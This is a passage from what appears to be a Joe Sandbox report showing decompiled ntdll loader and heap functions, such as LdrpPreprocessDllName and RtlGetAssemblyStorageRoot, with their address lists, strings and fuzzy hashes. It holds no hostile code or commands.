				signed int _t186;
				void* _t189;

				_t135 = __ecx;
				_t183 = __edx;
				_v12 = __ecx;
				if(E34E6C4A0(0,  &_v16) < 0) {
					_v8 = 0;
				} else {
					_v8 = 1;
				}
				_t138 = _a8;
				_t75 = 0;
				_t184 = 0;
				_v5 = 0;
				if(( *_t138 & 0x00800008) != 0) {
					L16:
					_v12 = _t135;
					if( *_t183 != 0) {
						__eflags =  *0x34f437c0 & 0x00000005;
						if(( *0x34f437c0 & 0x00000005) != 0) {
							__eflags = _t75;
							_t76 = "SxS";
							if(_t75 == 0) {
								_t76 = "API set";
							}
							_push(_t76);
							_push(_t183);
							E34ECE692("minkernel\\ntdll\\ldrutil.c", 0xa78, "LdrpPreprocessDllName", 2, "DLL %wZ was redirected to %wZ by %s\n", _t135);
							_t138 = _a8;
							_t189 = _t189 + 0x20;
						}
						_t79 =  *_t138 | 0x00000200;
						__eflags = _v5;
						 *_t138 = _t79;
						if(_v5 != 0) {
							 *_t138 = _t79 | 0x00000004;
						}
						_t81 = _t183;
						_v12 = _t81;
						L27:
						if(_t184 < 0) {
							goto L83;
						}
						if(( *_t138 & 0x00000200) != 0) {
							E34E5FCF0(_t138, _t183);
							_t81 = _v12;
						}
						_t165 = _t81[2];
						_t89 = ( *_t81 & 0x0000ffff) + 0xfffffffe + _t165;
						if(_t89 < _t165) {
							L34:
							_t184 = E34E6C7E7(_t183, 0x34e2116c);
							goto L39;
						} else {
							while(1) {
								_t140 =  *_t89 & 0x0000ffff;
								if(_t140 == 0x2e) {
									break;
								}
								if(_t140 != 0x2f && _t140 != 0x5c) {
									_t89 = _t89 - 2;
									if(_t89 >= _t165) {
										continue;
									}
								}
								goto L34;
							}
							_t141 = _t183[2];
							_t93 = ( *_t183 & 0x0000ffff) + 0xfffffffe + _t141;
							__eflags = _t93 - _t141;
							if(_t93 < _t141) {
								L38:
								__eflags = 0;
								 *((short*)(_t93 + 2)) = 0;
								L39:
								if(_t184 < 0) {
									goto L83;
								}
								goto L40;
							}
							while(1) {
								__eflags =  *_t93 - 0x2e;
								if( *_t93 != 0x2e) {
									goto L38;
								}
								_t93 = _t93 - 2;
								 *_t183 =  *_t183 + 0xfffe;
								__eflags = _t93 - _t141;
								if(_t93 >= _t141) {
									continue;
								}
								goto L38;
							}
							goto L38;
						}
					}
					_t168 = _t135[2];
					_t96 = ( *_t135 & 0x0000ffff) + 0xfffffffe + _t168;
					if(_t96 < _t168) {
						L22:
						 *_t138 =  *_t138 | 0x00000020;
						_t184 = 0;
						_t97 =  *_t135 & 0x0000ffff;
						if(_t97 == 0) {
							L26:
							_t81 = _t135;
							goto L27;
						}
						_t144 = _t97 + ( *_t183 & 0x0000ffff) + 2;
						if(_t144 > (_t183[1] & 0x0000ffff)) {
							__eflags = _t144 - 0xfffe;
							if(_t144 <= 0xfffe) {
								_t62 = _t144 + 0x3f; // -191
								_t186 = _t62 & 0xffffffc0;
								__eflags = _t186 - 0xfffe;
								if(_t186 > 0xfffe) {
									_t186 = 0xfffe;
								}
								_t145 = _t183[2];
								_t64 =  &(_t183[4]); // 0x1000008
								__eflags = _t145 - _t64;
								if(_t145 == _t64) {
									_t146 = E34E65D60(_t186);
									_v20 = _t146;
									__eflags = _t146;
									if(_t146 == 0) {
										goto L80;
									}
									_t103 =  *_t183 & 0x0000ffff;
									__eflags = _t103;
									if(_t103 != 0) {
										E34E988C0(_t146, _t183[2], _t103);
										_t146 = _v20;
										_t189 = _t189 + 0xc;
									}
									goto L78;
								} else {
									_t146 = E34ED3C57(_t186, _t145);
									L78:
									__eflags = _t146;
									if(_t146 == 0) {
										L80:
										_t184 = 0xc0000017;
										L25:
										_t138 = _a8;
										goto L26;
									}
									_t183[2] = _t146;
									_t183[1] = _t186;
									goto L24;
								}
							}
							_t184 = 0xc0000106;
							goto L25;
						}
						L24:
						_t184 = 0;
						E34E988C0(( *_t183 & 0x0000ffff) + _t183[2], _t135[2],  *_t135 & 0x0000ffff);
						_t189 = _t189 + 0xc;
						 *_t183 =  *_t183 + ( *_t135 & 0x0000ffff);
						 *((short*)(_t183[2] + (( *_t183 & 0x0000ffff) >> 1) * 2)) = 0;
						goto L25;
					} else {
						goto L18;
					}
					while(1) {
						L18:
						_t151 =  *_t96 & 0x0000ffff;
						if(_t151 == 0x5c || _t151 == 0x2f) {
							break;
						}
						_t96 = _t96 - 2;
						if(_t96 >= _t168) {
							continue;
						}
						_t138 = _a8;
						goto L22;
					}
					__eflags = L34E8432E(_t135) - 5;
					if(__eflags == 0) {
						_t184 = E34E6C7E7(_t183, _t135);
						goto L25;
					}
					_t112 = E34E723C4(_t135, _t183, __eflags);
					_t138 = _a8;
					_t184 = _t112;
					_t81 = _t135;
					__eflags = _t184;
					if(_t184 < 0) {
						goto L83;
					}
					 *_t138 =  *_t138 | 0x00000600;
					goto L27;
				} else {
					_v5 = 0;
					_v20 =  *[fs:0x30];
					_v7 = 1;
					E34E6DF36(0, _t135, 0x14d0);
					asm("sbb edx, edx");
					if(E34E7015C( *((intOrPtr*)( *[fs:0x30] + 0x38)), _t135,  ~_a4 & _a4 + 0x0000002c,  &_v6,  &_v28) < 0 || _v6 == 0) {
						_t119 = 0x14d3;
					} else {
						__eflags = _v28;
						if(_v28 == 0) {
							_t119 = 0x14d2;
						} else {
							_t119 = 0x14d1;
						}
					}
					E34E6DF36(0, _t135, _t119);
					if(_v6 != 0) {
						__eflags = _v28;
						if(_v28 == 0) {
							_t184 = 0xc0000481;
							goto L14;
						}
						 *_t183 = 0;
						E34E95050(0,  &_v44, E34E601C0());
						E34E6C7E7(_t183,  &_v44);
						E34E6C7E7(_t183, 0x34e21008);
						_t184 = E34E6C7E7(_t183,  &_v28);
						__eflags = _t184;
						if(_t184 < 0) {
							goto L7;
						}
						_t134 =  *(_v20 + 0x10);
						__eflags = _t134;
						if(_t134 == 0) {
							L53:
							_t128 = 0;
							__eflags = 0;
							L54:
							_t161 = _t183;
							goto L8;
						}
						__eflags =  *(_t134 + 8) & 0x00001000;
						if(( *(_t134 + 8) & 0x00001000) != 0) {
							_t128 = 1;
							goto L54;
						}
						goto L53;
					} else {
						L7:
						_t128 = _v7;
						_t161 = _t135;
						L8:
						if(_t184 < 0) {
							L83:
							__eflags =  *0x34f437c0 & 0x00000003;
							if(( *0x34f437c0 & 0x00000003) != 0) {
								_push(_t184);
								E34ECE692("minkernel\\ntdll\\ldrutil.c", 0xab2, "LdrpPreprocessDllName", 0, "LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx\n", _t135);
							}
							__eflags =  *0x34f437c0 & 0x00000010;
							if(( *0x34f437c0 & 0x00000010) != 0) {
								asm("int3");
							}
							L40:
							if(_v8 != 0) {
								E34E6C4A0(_v16,  &_v16);
							}
							return _t184;
						} else {
							if(_t128 != 0 &&  *0x34f45d70 == 0) {
								_t136 = E34E69870(1, _t161, 0x34e2116c, 0,  &_v36, 0, 0, 0, 0);
								if(_t136 >= 0) {
									_v5 = 1;
									E34E723C4( &_v36, _t183, __eflags);
									E34E7E3C9( &_v36);
								}
								if(_t136 != 0xc0150008) {
									_t184 = _t136;
								}
								_t135 = _v12;
							}
							L14:
							if(_t184 < 0) {
								goto L83;
							} else {
								_t138 = _a8;
								_t75 = _v5;
								goto L16;
							}
						}
					}
				}
			}

0x34e6b0de
0x34e6b0e3
0x34e6b0e5
0x34e6b0ef
0x34eb81db
0x34e6b0f5
0x34e6b0f5
0x34e6b0f5
0x34e6b0f9
0x34e6b0fc
0x34e6b0fe
0x34e6b100
0x34e6b109
0x34e6b1d5
0x34e6b1d9
0x34e6b1dc
0x34e6b303
0x34e6b30a
0x34eb81f8
0x34eb81fa
0x34eb81ff
0x34eb8201
0x34eb8201
0x34eb8206
0x34eb8207
0x34eb821f
0x34eb8224
0x34eb8227
0x34eb8227
0x34e6b312
0x34e6b317
0x34e6b31b
0x34e6b31d
0x34e6b3ff
0x34e6b3ff
0x34e6b323
0x34e6b325
0x34e6b264
0x34e6b266
0x00000000
0x00000000
0x34e6b272
0x34e6b2f6
0x34e6b2fb
0x34e6b2fb
0x34e6b278
0x34e6b281
0x34e6b285
0x34e6b2a0
0x34e6b2ac
0x00000000
0x34e6b287
0x34e6b287
0x34e6b287
0x34e6b28d
0x00000000
0x00000000
0x34e6b292
0x34e6b299
0x34e6b29e
0x00000000
0x00000000
0x34e6b29e
0x00000000
0x34e6b292
0x34e6b2b3
0x34e6b2b9
0x34e6b2bb
0x34e6b2bd
0x34e6b2ca
0x34e6b2ca
0x34e6b2cc
0x34e6b2d0
0x34e6b2d2
0x00000000
0x00000000
0x00000000
0x34e6b2d2
0x34e6b2c0
0x34e6b2c0
0x34e6b2c4
0x00000000
0x00000000
0x34eb82bf
0x34eb82c2
0x34eb82c5
0x34eb82c7
0x00000000
0x00000000
0x00000000
0x34eb82cd
0x00000000
0x34e6b2c0
0x34e6b285
0x34e6b1e5
0x34e6b1eb
0x34e6b1ef
0x34e6b210
0x34e6b210
0x34e6b213
0x34e6b215
0x34e6b21b
0x34e6b262
0x34e6b262
0x00000000
0x34e6b262
0x34e6b225
0x34e6b22d
0x34eb823f
0x34eb8245
0x34eb8251
0x34eb8254
0x34eb8257
0x34eb825d
0x34eb825f
0x34eb825f
0x34eb8264
0x34eb8267
0x34eb826a
0x34eb826c
0x34eb827f
0x34eb8281
0x34eb8284
0x34eb8286
0x00000000
0x00000000
0x34eb8288
0x34eb828b
0x34eb828e
0x34eb8295
0x34eb829a
0x34eb829d
0x34eb829d
0x00000000
0x34eb826e
0x34eb8275
0x34eb82a0
0x34eb82a0
0x34eb82a2
0x34eb82b0
0x34eb82b0
0x34e6b25f
0x34e6b25f
0x00000000
0x34e6b25f
0x34eb82a4
0x34eb82a7
0x00000000
0x34eb82a7
0x34eb826c
0x34eb8247
0x00000000
0x34eb8247
0x34e6b233
0x34e6b236
0x34e6b243
0x34e6b24b
0x34e6b24e
0x34e6b25b
0x00000000
0x00000000
0x00000000
0x00000000
0x34e6b1f1
0x34e6b1f1
0x34e6b1f1
0x34e6b1f7
0x00000000
0x00000000
0x34e6b206
0x34e6b20b
0x00000000
0x00000000
0x34e6b20d
0x00000000
0x34e6b20d
0x34e6b3ae
0x34e6b3b1
0x34eb8238
0x00000000
0x34eb8238
0x34e6b3bb
0x34e6b3c0
0x34e6b3c3
0x34e6b3c5
0x34e6b3c7
0x34e6b3c9
0x00000000
0x00000000
0x34e6b3cf
0x00000000
0x34e6b10f
0x34e6b117
0x34e6b123
0x34e6b129
0x34e6b12d
0x34e6b144
0x34e6b154
0x34e6b160
0x34e6b32d
0x34e6b32d
0x34e6b332
0x34eb81e4
0x34e6b338
0x34e6b338
0x34e6b338
0x34e6b332
0x34e6b16a
0x34e6b173
0x34e6b342
0x34e6b347
0x34eb81ee
0x00000000
0x34eb81ee
0x34e6b34f
0x34e6b35c
0x34e6b366
0x34e6b372
0x34e6b381
0x34e6b383
0x34e6b385
0x00000000
0x00000000
0x34e6b38e
0x34e6b391
0x34e6b393
0x34e6b39e
0x34e6b39e
0x34e6b39e
0x34e6b3a0
0x34e6b3a0
0x00000000
0x34e6b3a0
0x34e6b395
0x34e6b39c
0x34e6b406
0x00000000
0x34e6b406
0x00000000
0x34e6b179
0x34e6b179
0x34e6b179
0x34e6b17c
0x34e6b17e
0x34e6b180
0x34eb82d2
0x34eb82d2
0x34eb82d9
0x34eb82db
0x34eb82f3
0x34eb82f8
0x34eb82fb
0x34eb8302
0x34eb8308
0x34eb8308
0x34e6b2d8
0x34e6b2dc
0x34e6b2e5
0x34e6b2e5
0x34e6b2f2
0x34e6b186
0x34e6b188
0x34e6b1ae
0x34e6b1b2
0x34e6b3dc
0x34e6b3e3
0x34e6b3eb
0x34e6b3eb
0x34e6b1be
0x34e6b3f5
0x34e6b3f5
0x34e6b1c4
0x34e6b1c4
0x34e6b1c7
0x34e6b1c9
0x00000000
0x34e6b1cf
0x34e6b1cf
0x34e6b1d2
0x00000000
0x34e6b1d2
0x34e6b1c9
0x34e6b180
0x34e6b173

Strings

DLL %wZ was redirected to %wZ by %s, xrefs: 34EB8209
minkernel\ntdll\ldrutil.c, xrefs: 34EB821A, 34EB82EE
LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx, xrefs: 34EB82DD
SxS, xrefs: 34EB81FA
API set, xrefs: 34EB8201, 34EB8206
LdrpPreprocessDllName, xrefs: 34EB8210, 34EB82E4

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
API String ID: 0-122214566
Opcode ID: a816834a50074bde1358a2ec0897623eecc1a826dfdde36294ae0fb2bbae2807
Instruction ID: 8fe50d051c4b8e47bcc40ef43e82d578f59a6fae7d0e8c4cf9720530d413c700
Opcode Fuzzy Hash: a816834a50074bde1358a2ec0897623eecc1a826dfdde36294ae0fb2bbae2807
Instruction Fuzzy Hash: 36C13475B44325EFEB148B64C890BBE77A5AF4530CF544169E843AB395EB78C844C790

Uniqueness

Uniqueness Score: -1.00%

Function 34E8C5C6 Relevance: 7.6, Strings: 6, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E34E8C5C6() {
				signed int _v8;
				signed int _v24;
				char _v92;
				char _v96;
				char _v97;
				intOrPtr _v100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t42;
				signed char _t52;
				void* _t58;
				intOrPtr _t65;
				intOrPtr* _t72;
				void* _t73;
				signed int _t75;
				void* _t76;
				signed int _t77;
				signed int _t79;

				_t79 = (_t77 & 0xfffffff8) - 0x64;
				_v8 =  *0x34f4b370 ^ _t79;
				_t72 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x2a4;
				_t75 = 0;
				if( *_t72 != 0) {
					__eflags =  *0x34f437c0 & 0x00000005;
					if(( *0x34f437c0 & 0x00000005) != 0) {
						E34ECE692("minkernel\\ntdll\\ldrredirect.c", 0x23c, "LdrpInitializeImportRedirection", 2, "Loading import redirection DLL: \'%wZ\'\n", _t72);
						_t79 = _t79 + 0x18;
					}
					E34E98F40( &_v92, 0, 0x50);
					_t79 = _t79 + 0xc;
					_t68 =  &_v92;
					_t59 = _t72;
					_t75 = L34E46B45(_t72,  &_v92, 0x1000001,  &_v96);
					__eflags = _v24;
					if(_v24 != 0) {
						E34E7E7E0(_t59, _v92);
					}
					__eflags = _t75;
					if(__eflags >= 0) {
						_t75 = E34ED4348(_v96, __eflags);
						__eflags = _t75;
						if(_t75 >= 0) {
							E34E719DF(0);
							E34E72755(_t68);
							_v97 = 0;
							_t65 =  *((intOrPtr*)(_v96 + 0x50));
							_t42 = E34E71934(_t65, 0,  &_v97);
							_push(_t65);
							_t75 = _t42;
							_push(_t75);
							_t68 = 2;
							E34E7270D(_t68);
							E34E879F9(__eflags);
							__eflags = _t75;
							if(_t75 >= 0) {
								 *( *((intOrPtr*)(_v100 + 0x50)) + 0xc) =  *( *((intOrPtr*)(_v100 + 0x50)) + 0xc) | 0xffffffff;
								 *((short*)( *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x50)))) - 0x1c)) = 0xffff;
								E34ED05C6(_v100, _t68);
								 *0x34f45c9c = _v100;
							}
						} else {
							_t52 =  *0x34f437c0; // 0x0
							__eflags = _t52 & 0x00000003;
							if((_t52 & 0x00000003) != 0) {
								E34ECE692("minkernel\\ntdll\\ldrredirect.c", 0x257, "LdrpInitializeImportRedirection", 0, "Unable to build import redirection Table, Status = 0x%x\n", _t75);
								_t52 =  *0x34f437c0; // 0x0
								_t79 = _t79 + 0x18;
							}
							__eflags = _t52 & 0x00000010;
							if((_t52 & 0x00000010) != 0) {
								asm("int3");
							}
						}
					}
				}
				_pop(_t73);
				_pop(_t76);
				_pop(_t58);
				return L34E94B50(_t75, _t58, _v8 ^ _t79, _t68, _t73, _t76);
			}

0x34e8c5ce
0x34e8c5d8
0x34e8c5ea
0x34e8c5f0
0x34e8c5f5
0x34ec7f71
0x34ec7f78
0x34ec7f91
0x34ec7f96
0x34ec7f96
0x34ec7fa1
0x34ec7fa6
0x34ec7fad
0x34ec7fb1
0x34ec7fbe
0x34ec7fc0
0x34ec7fc4
0x34ec7fca
0x34ec7fca
0x34ec7fcf
0x34ec7fd1
0x34ec7fe0
0x34ec7fe2
0x34ec7fe4
0x34ec8022
0x34ec8027
0x34ec8037
0x34ec803b
0x34ec803e
0x34ec8043
0x34ec8044
0x34ec8046
0x34ec8049
0x34ec804a
0x34ec804f
0x34ec8054
0x34ec8056
0x34ec8068
0x34ec8075
0x34ec807d
0x34ec8086
0x34ec8086
0x34ec7fe6
0x34ec7fe6
0x34ec7feb
0x34ec7fed
0x34ec8005
0x34ec800a
0x34ec800f
0x34ec800f
0x34ec8012
0x34ec8014
0x34ec801a
0x34ec801a
0x34ec8014
0x34ec7fe4
0x34ec7fd1
0x34e8c601
0x34e8c602
0x34e8c603
0x34e8c60e

Strings

minkernel\ntdll\ldrinit.c, xrefs: 34E8C5E3
Loading import redirection DLL: '%wZ', xrefs: 34EC7F7B
Unable to build import redirection Table, Status = 0x%x, xrefs: 34EC7FF0
LdrpInitializeImportRedirection, xrefs: 34EC7F82, 34EC7FF6
minkernel\ntdll\ldrredirect.c, xrefs: 34EC7F8C, 34EC8000
LdrpInitializeProcess, xrefs: 34E8C5E4

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: b28825705c10a51013c58fe46a5f5f470d1795f9393aad4af3e674dfd264ae43
Instruction ID: 6ed45b95836cf6b6b8e747f6565032f2eddcfdb68941a5f07f13cca1da71ee65
Opcode Fuzzy Hash: b28825705c10a51013c58fe46a5f5f470d1795f9393aad4af3e674dfd264ae43
Instruction Fuzzy Hash: 143108B1A14342DFE314DF28DD45E2AB7D4EF95B24F04455CF884AB391DA20DC05CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 34E82594 Relevance: 7.6, Strings: 6, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E34E82594(signed int __ecx, void* __edx, signed int _a4, intOrPtr* _a8, intOrPtr _a16) {
				void* _v8;
				void* _v12;
				char _v16;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr* _t34;
				signed int _t35;
				void* _t38;
				signed int _t41;
				void* _t43;

				_t38 = __edx;
				_t35 = __ecx;
				_t21 =  *[fs:0x30];
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				if(__edx == 0x34e2120c) {
					E34EDEF10(0x33, 0, "SXS: %s() passed the empty activation context\n", "RtlGetAssemblyStorageRoot");
					goto L23;
				} else {
					_t34 = _a8;
					if(_t34 != 0) {
						 *_t34 = 0;
					}
					_t41 = _a4;
					if((_t35 & 0xfffffffc) != 0 || _t41 < 1 || _t34 == 0) {
						_push(E34E82C10);
						_push(_t34);
						_push(_t41);
						_push(_t35);
						E34EDEF10(0x33, 0, "SXS: %s() bad parameters:\nSXS:    Flags              : 0x%lx\nSXS:    AssemblyRosterIndex: 0x%lx\nSXS:    AssemblyStorageRoot: %p\nSXS:    Callback           : %p\n", "RtlGetAssemblyStorageRoot");
						goto L23;
					} else {
						_t43 = E34E8265C(_t35 & 0x00000003, _t21, _t38,  &_v12,  &_v8,  &_v16);
						if(_t43 < 0) {
							_push(_t43);
							_push("SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header.  Status = 0x%08lx\n");
							goto L20;
						} else {
							_t40 = _v12;
							if(_v12 == 0) {
								L14:
								_t43 = 0;
							} else {
								_t27 = _v16;
								if(_t27 == 0) {
									L16:
									_t43 = 0xc00000e5;
								} else {
									_t37 = _v8;
									if(_v8 == 0) {
										goto L16;
									} else {
										if(_t41 >=  *((intOrPtr*)(_t27 + 8))) {
											_push( *((intOrPtr*)(_t27 + 8)));
											_push(_t41);
											E34EDEF10(0x33, 0, "SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx\n", "RtlGetAssemblyStorageRoot");
											L23:
											_t43 = 0xc000000d;
										} else {
											_t43 = E34E82919(_t37, _t40, _t41, _t37, _a16);
											if(_t43 < 0) {
												_push(_t43);
												_push("SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry.  Status = 0x%08lx\n");
												L20:
												_push(0);
												_push(0x33);
												E34EDEF10();
											} else {
												_t32 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 8)) + _t41 * 4));
												if(_t32 == 0) {
													goto L16;
												} else {
													 *_t34 = _t32 + 4;
													goto L14;
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return _t43;
			}

0x34e82594
0x34e82594
0x34e8259c
0x34e825a6
0x34e825a9
0x34e825ac
0x34e825b6
0x34ec1f77
0x00000000
0x34e825bc
0x34e825bc
0x34e825c1
0x34e825c3
0x34e825c3
0x34e825c5
0x34e825ce
0x34ec1fbc
0x34ec1fc1
0x34ec1fc2
0x34ec1fc3
0x34ec1fd1
0x00000000
0x34e825e5
0x34e825fc
0x34e82600
0x34ec1f81
0x34ec1f82
0x00000000
0x34e82606
0x34e82606
0x34e8260b
0x34e8264a
0x34e8264a
0x34e8260d
0x34e8260d
0x34e82612
0x34e82655
0x34e82655
0x34e82614
0x34e82614
0x34e82619
0x00000000
0x34e8261b
0x34e8261e
0x34ec1fa0
0x34ec1fa3
0x34ec1fb2
0x34ec1fd9
0x34ec1fd9
0x34e82624
0x34e8262e
0x34e82632
0x34ec1f89
0x34ec1f8a
0x34ec1f8f
0x34ec1f8f
0x34ec1f91
0x34ec1f93
0x34e82638
0x34e8263e
0x34e82643
0x00000000
0x34e82645
0x34e82648
0x00000000
0x34e82648
0x34e82643
0x34e82632
0x34e8261e
0x34e82619
0x34e82612
0x34e8260b
0x34e82600
0x34e825ce
0x34e82652

Strings

SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 34EC1FA9
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 34EC1F8A
SXS: %s() passed the empty activation context, xrefs: 34EC1F6F
RtlGetAssemblyStorageRoot, xrefs: 34EC1F6A, 34EC1FA4, 34EC1FC4
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 34EC1FC9
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 34EC1F82

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: bb7e733292752e700f529e4d4bbe033282342c01bb5d681da31d65fa45dc9df4
Instruction ID: 8d00f8692fee6884ef4c94bf25e025dfc460633d8e6990a077dde9b0905fca90
Opcode Fuzzy Hash: bb7e733292752e700f529e4d4bbe033282342c01bb5d681da31d65fa45dc9df4
Instruction Fuzzy Hash: 1A31017AE01228BFFB158B96DD44F5BBA68DF41A94F018499F904B7240D730EE01EEE0

Uniqueness

Uniqueness Score: -1.00%

Function 34E60680 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414
COMMONCrypto

Download Yara Rule

C-Code - Quality: 75%

			E34E60680(intOrPtr __ecx, signed int* __edx) {
				signed int* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr* _v24;
				signed int _v28;
				signed int _v32;
				signed char _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t136;
				signed int _t141;
				void* _t143;
				signed int* _t145;
				signed int* _t146;
				intOrPtr _t148;
				unsigned int _t150;
				char _t162;
				signed int* _t164;
				signed char* _t165;
				intOrPtr _t166;
				signed int* _t168;
				signed char* _t169;
				signed char* _t171;
				signed char* _t180;
				intOrPtr _t195;
				signed int _t197;
				signed int _t209;
				signed char _t210;
				intOrPtr* _t215;
				intOrPtr _t222;
				signed int _t232;
				intOrPtr* _t242;
				intOrPtr _t244;
				unsigned int _t245;
				intOrPtr _t247;
				intOrPtr* _t258;
				signed char _t264;
				unsigned int _t269;
				intOrPtr _t271;
				signed int* _t276;
				signed int _t277;
				void* _t278;
				intOrPtr _t281;
				signed int* _t287;
				intOrPtr _t288;
				unsigned int _t291;
				unsigned int* _t295;
				intOrPtr* _t298;
				intOrPtr _t300;

				_t231 = __edx;
				_v8 = __edx;
				_t300 = __ecx;
				_t298 = E34E60ACE(__edx,  *__edx);
				if(_t298 == __ecx + 0x8c) {
					L45:
					return 0;
				}
				if( *0x34f46960 >= 1) {
					__eflags =  *(_t298 + 0x14) -  *__edx;
					if(__eflags < 0) {
						_t222 =  *[fs:0x30];
						__eflags =  *(_t222 + 0xc);
						if( *(_t222 + 0xc) == 0) {
							_push("HEAP: ");
							E34E4B910();
						} else {
							E34E4B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(UCRBlock->Size >= *Size)");
						E34E4B910();
						__eflags =  *0x34f45da8;
						if(__eflags == 0) {
							E34F0FC95(_t231, 1, _t298, __eflags);
						}
					}
				}
				_t136 =  *((intOrPtr*)(_t298 - 2));
				_t4 = _t298 - 8; // -8
				_t232 = _t4;
				if(_t136 != 0) {
					_v12 = (_t232 & 0xffff0000) - ((_t136 & 0x000000ff) << 0x10) + 0x10000;
				} else {
					_v12 = _t300;
				}
				_v20 =  *((intOrPtr*)(_t298 + 0x10));
				_t141 =  *(_t300 + 0xcc) ^  *0x34f46d48;
				_v28 = _t141;
				if(_t141 != 0) {
					 *0x34f491e0(_t300,  &_v20, _v8);
					_t143 = _v28();
					_t276 = _v8;
					goto L13;
				} else {
					_t295 = _v8;
					if( *(_t298 + 0x14) -  *_t295 <=  *(_t300 + 0x6c) << 3) {
						_t269 =  *(_t298 + 0x14);
						__eflags = _t269 -  *(_t300 + 0x5c) << 3;
						if(__eflags < 0) {
							 *_t295 = _t269;
						}
					}
					if(( *(_t300 + 0x40) & 0x00040000) != 0) {
						_push(0);
						_push(0x1c);
						_v16 = 0x40;
						_push( &_v60);
						_push(3);
						_push(_t300);
						_push(0xffffffff);
						_t209 = L34E92BE0();
						__eflags = _t209;
						_t210 = _v56;
						if(_t209 < 0) {
							L61:
							__eflags = 0;
							E34F15FED(0, _t300, 1, _t210, 0, 0);
							_v16 = 4;
							L62:
							_t276 = _v8;
							goto L8;
						}
						__eflags = _t210 & 0x00000060;
						if((_t210 & 0x00000060) == 0) {
							goto L61;
						}
						__eflags = _v60 - _t300;
						if(__eflags == 0) {
							goto L62;
						}
						goto L61;
					} else {
						_v16 = 4;
						L8:
						_v32 =  *_t276;
						_v28 =  *((intOrPtr*)(_t300 + 0x1f8)) -  *((intOrPtr*)(_t300 + 0x244));
						_t215 = _t300 + 0xd4;
						_v24 = _t215;
						if( *0x34f4373c != 0) {
							L11:
							_push(_v16);
							_push("true");
							_push(_t276);
							_push(0);
							_push( &_v20);
							_push(0xffffffff);
							_t143 = E34E92B10();
							_t276 = _v8;
							L12:
							 *((intOrPtr*)(_t300 + 0x21c)) =  *((intOrPtr*)(_t300 + 0x21c)) + 1;
							L13:
							if(_t143 < 0) {
								 *((intOrPtr*)(_t300 + 0x224)) =  *((intOrPtr*)(_t300 + 0x224)) + 1;
								goto L45;
							}
							_t145 =  *( *[fs:0x30] + 0x50);
							if(_t145 != 0) {
								__eflags =  *_t145;
								if(__eflags == 0) {
									goto L15;
								}
								_t146 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
								L16:
								if( *_t146 != 0) {
									__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
